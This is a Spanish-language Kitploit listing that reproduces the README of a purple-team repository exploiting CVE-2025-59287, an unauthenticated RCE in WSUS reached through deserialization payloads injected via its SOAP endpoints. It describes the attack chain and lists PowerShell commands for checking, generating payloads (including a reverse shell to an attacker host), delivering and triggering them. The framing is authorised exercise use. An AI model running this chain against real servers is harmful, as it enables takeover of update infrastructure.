Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59287-Exercise-Use — Scripts de ejercicio de equipo púrpura que demuestran CVE-2025-59287, una RCE no autenticada en WSUS mediante inyección de carga útil de deserialización maliciosa en la base de datos de WSUS. | Kitploit
Herramientas/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
Análisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed TeamingDesarrollo de PayloadsLabs y Práctica
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

Scripts de ejercicio de equipo púrpura que demuestran CVE-2025-59287, una RCE no autenticada en WSUS mediante inyección de carga útil de deserialización maliciosa en la base de datos de WSUS.

Ver Repositorio
2hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-59287 — RCE no autenticado en WSUS

Scripts de ejercicio de equipo púrpura para CVE-2025-59287, una vulnerabilidad de ejecución remota de código no autenticada en Windows Server Update Services (WSUS).

Solo para uso autorizado. Para usar en entornos de ejercicio controlados contra sistemas que poseas o para los que tengas permiso explícito por escrito para probar.

Cómo funciona

La vulnerabilidad abusa de los endpoints SOAP de WSUS accesibles de forma anónima para inyectar una carga útil de deserialización maliciosa en la base de datos de WSUS. La carga útil se ejecuta cuando se abre la consola administrativa de WSUS o se activa una sincronización.

  1. El servicio de autenticación de WSUS emite un token válido a cualquier cliente anónimo
  2. El token se intercambia por una cookie de sesión de informes a través del servicio web del cliente
  3. Se inyecta un objeto serializado malicioso en la base de datos de WSUS a través del servicio de informes
  4. La carga útil se ejecuta cuando se carga la consola de WSUS o se dispara un evento de sincronización

Requisitos

  • Máquina de ataque Windows con PowerShell 5.1+
  • Acceso de red a WSUS en el puerto 8530
  • ysoserial.net colocado en la carpeta ysoserial\Release\ (ver Configuración)

Estructura del repositorio

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # Verifica si el objetivo es vulnerable
├── 2-generate.ps1    # Genera el blob de carga útil serializada
├── 3-deliver.ps1     # Entrega la carga útil al servidor WSUS
├── 4-verify.ps1      # Verifica la ejecución y limpia
├── ysoserial/        # Coloca aquí el release de ysoserial.net (no incluido en el repositorio)
│   └── Release/
│       └── ysoserial.exe
└── README.md

Configuración

Clona o descarga el repositorio. Agrega ysoserial.net para que la ruta coincida con ysoserial\Release\ysoserial.exe.

Descarga ysoserial.net desde: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 Esto activará Windows Defender por defecto

Uso

Ejecuta todos los scripts desde la raíz del repositorio.

1 — Verificar

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — Generar

File drop (sin necesidad de listener, recomendado primero):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

Reverse shell:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — Entregar

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — Desencadenar

En el servidor WSUS, abre la consola administrativa desde Inicio > Windows Server Update Services, o desencadena una sincronización mediante PowerShell:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — Verificar y limpiar

Verificar ejecución:

root@kitploit:~
.\4-verify.ps1

Verificar y limpiar todos los artefactos:

root@kitploit:~
.\4-verify.ps1 -Cleanup

Desde la máquina de ataque a través de recurso compartido admin:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

Después de la limpieza, elimina el equipo de ejercicio de la consola de WSUS en Equipos.

Oportunidades de detección


Referencias

  • CVE-2025-59287 — Investigación original: hawktrace.com\
  • ysoserial
  • NIST
  • Generación de exploit/blob .NET
  • tecxx
  • mrk336
Descargar herramienta